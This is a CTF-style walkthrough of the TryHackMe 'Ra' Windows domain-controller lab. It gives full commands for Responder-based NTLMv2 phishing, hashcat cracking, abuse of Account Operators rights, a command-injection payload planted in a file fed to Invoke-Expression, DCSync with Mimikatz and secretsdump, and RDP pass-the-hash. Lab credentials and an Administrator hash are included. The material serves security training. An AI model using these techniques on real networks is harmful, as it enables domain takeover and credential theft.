TL;DR Walkthrough to the TryHackMe Ra practice VM, including a few things I didn’t see on the linked write-ups.
A full list of our TryHackMe walkthroughs and cheatsheets is here.
I realized I should start these off with some hints:
- There are no ASREPRoastable or Kerberoastable users
- There is a webserver running on the DC
- If there were hidden pages on the webserver, I didn’t find them
- There are share drives with useful data
- Bear in mind the rights held by the Account Operators group in AD
I’m not the most original out there, so I needed a few hints to get through this one myself. This writeup was really helpful.
On an admin note, much like the last practice VM I had to restart this one numerous times to get through. Hence the IP keeps changing. All IPs shown are the target. There is one exception regarding Responder.
Scanning & enumeration
As always start out with an nmap scan.
sudo nmap -sV -O 10.10.234.141
We can tell right away that it’s a DC. Hence I visited the website, copy/pasted the last & first names I saw on thee, and tried enumerating usernames with Mishka’s username generator and Kerbrute. However I wasn’t getting a hit on anything other than Administrator@windcorp.thm and the guest account was disabled so enumerating without credentials was out.
As it turns out I was overthinking it. I got a hint from GAMEOFPWNZ’s writeup and realized one can simply do a ‘Save Image As’ on one of the employee pics and learn the username format.
./kerbrute_linux_amd64 userenum -d windcorp.thm --dc 10.10.238.103 ../Wordlists/Brute2.txt
Additionally we know lillyle’s favorite pet’s name.
This means we can simply request a password reset.
Please note that you have to add the target’s IP and both windcorp.thm and fire.windcorp.thm to your /etc/hosts file in Kali for this to work. This will also be important later.
We can now do authenticated enumeration.
enum4linux -u windcorp.thm\\lilyle -a 10.10.238.103
crackmapexec smb 10.10.238.103 -u lilyle -p ChangeMe#1234 --shares
There’s the normal SYSVOL & NETLOGON, which didn’t contain anything helpful like plaintext credentials in a script, but there was also Shared and Users.
smbclient \\\\10.10.172.170\\Shared -U Windcorp.thm\\lilyle
This share had the first flag.
more “Flag 1.txt”
It also includes a deb, dmg, exe, and tar.gz files for something called ‘Spark 2.8.3’. The webpage that we abused earlier to reset a password has a list of employee names and online status indicators. This must be a hint to install Spark, try messaging them, and see what happens.
I downloaded the *.deb but I couldn’t get it to run. After wasting far too much time I finally realized I could just grab the latest, working copy from here.
sudo dpkg -i spark_2_8_2.tar.gz
- Username: lilyle
- Password: ChangeMe#1234
- Domain: Windcorp.thm
If you get an error regarding the server’s cert then go in Advanced and uncheck the option about checking certs.
There’s only one user online, so search and chat them up.
There are many ways to capture NTLMv2 authentication attempts from simply running Responder and waiting for someone to fat finger something to MITM6. There’s many other really creative ways to elicit Windows to send a NTLMv2 authentication attempt described here.
It turns out that Spark IM is another way, as seen above.
Run Responder and phish:
sudo responder -I tun0 -rdwv
Copy/paste the captured NTLMv2 to BuseHash.txt, then:
hashcat -m 5600 BuseHash.txt rockyou.txt --force
We get a hit, and buse has WinRM access.
evil-winrm -i 10.10.244.66 -u buse -p uzunLM+3131
I uploaded PowerUp.ps1, poked around AD a bit, tried Kerberoasting, but didn’t get anywhere. This user can login to a DC, but can’t do much else.
(Get-ADUser $env:USERNAME -Properties *).MemberOf
(Get-ADGroup "IT" -Properties *).MemberOf
This is because they’re nested in the Account Operators AD group. This builtin group by default has privileges to login to DCs and manage all non-protected users & groups. By protected we mean those whose Attribute AdminCount = 1. These users and groups get their DACL from the AdminSDHolder and do not inherit their DACL from any OUs that they are placed in by a careless administrator. This is to stop a system administrator from shooting themselves in the foot by accident, much like the PowerShell execution policy. It will not stop an attacker from shooting you in the foot on purpose.
The VM’s author meant for us to poke around and notice a folder C:\scripts with a checkservers.ps1 file inside. This PS1 pulls values from a text file stored in a user’s folder, does some stuff, and passes the result to Invoke-Expression.
I have said before that I am not sure that anyone other than attackers and malware writers use Invoke-Expression. More accurately they tend to use an obscured version of its alias iex. In this case we are the attacker and we were meant to find this. I am probably preaching to the choir, but Invoke-Expression takes a string as input and runs it as a command.
Escalating to Domain Admin
So how do we abuse this? Simple; abuse our Account Operators privileges, reset the user’s password who holds the text file, and essentially pull a command injection attack.
Set-ADAccountPassword -Identity brittanycr -Reset -NewPassword (ConvertTo-SecureString -AsPlainText “ChangeASAP00!!” -Force)
Sadly brittanycr does not have WinRM privileges, so we have to create a hosts.txt file on Kali and then upload it via smbclient. I saved the below in hosts.txt :
; Add-ADGroupMember -Identity “Domain Admins” -Members “buse” ; Add-ADGroupMember -Identity “Administrators” -Members “buse”
Then upload it to brittanycr’s user folder on the DC.
smbclient \\\\10.10.244.66\\Users -U Windcorp.thm\\brittanycr
After that we simply wait a few minutes for the DC’s scheduled task to run the PS1 and our command injection to kick in. I had a couple Kali Terminal tabs open and was still logged in as buse in one tab so I logged out & logged back in via evil-winrm, uploaded Mimikatz.ps1, and dumped just the Administrator’s hash while I was waiting on secretsdump to finish in another tab.
evil-winrm -i 10.10.244.66 -u buse -p uzunLM+3131
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::dcsync /user:windcorp\Administrator"'
Of course in the other tab I simply ran:
python3 /home/kali/Downloads/impacket-master/examples/secretsdump.py -just-dc buse:uzunLMemail@example.com >> hashes
This took awhile as there are roughly 4,761 users in windcorp.thm.
While I was waiting on secretsdump to finish it occurred to me that I had not even looked for the second flag. Hence I attempted to RDP as the Administrator and hit the standard buzz kill.
No problem, we just tweak the registry while logged in via WinRM.
evil-winrm -i 10.10.244.66 -u Administrator -H bfa4cae19504e0591ef0a523a1936cd4
New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -name 'DisableRestrictedAdmin' -PropertyType 'DWORD' -value '0' -force
xfreerdp /v: 10.10.244.66 /u:Administrator /pth:bfa4cae19504e0591ef0a523a1936cd4 /dynamic-resolution
Get-ChildItem -Path C:\ -Include flag*.txt -Recurse -ErrorAction SilentlyContinue | Get-Content
I had all the flags before secretsdump finished :)
There are over 4,700 users, 4 or 5 non default OUs, and numerous groups created in the VM’s domain. AD wasn’t really much of a factor in the exercise though, just that Account Operators can control non-administrative accounts. I do give the VM author a lot of credit for including phishing. I believe this is the first CTF type exercise I have seen that did. Overall it was good practice.
4 ways to capture NTLMv2: https://www.hackingarticles.in/4-ways-capture-ntlm-hashes-network/
More ways to capture NTLMv2: https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html
Even more (20 +) ways to capture NTLMv2: https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/
Handy table of hashcat modes & hash types: https://hashcat.net/wiki/doku.php?id=example_hashes